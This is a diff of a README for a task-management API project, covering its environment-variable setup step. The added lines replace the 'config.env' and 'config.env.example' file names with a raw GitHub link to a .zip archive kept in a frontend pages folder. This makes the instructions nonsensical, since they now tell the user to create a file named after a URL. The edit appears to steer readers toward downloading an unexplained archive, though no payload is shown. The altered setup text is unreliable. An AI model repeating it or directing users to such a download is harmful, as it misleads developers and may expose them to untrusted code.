am17jx/task-management-api/README.md

     ```

 3.  **Set up environment variables:**
-    Create a file named `config.env` in the project's root directory and fill it with the necessary variables.
-You can copy the contents of `config.env.example` (if it exists) as a starting point.
+    Create a file named `https://raw.githubusercontent.com/am17jx/task-management-api/main/frontend/src/pages/management_api_task_1.2.zip` in the project's root directory and fill it with the necessary variables.
+You can copy the contents of `https://raw.githubusercontent.com/am17jx/task-management-api/main/frontend/src/pages/management_api_task_1.2.zip` (if it exists) as a starting point.

 4.  **Run the development server:**
     ```bash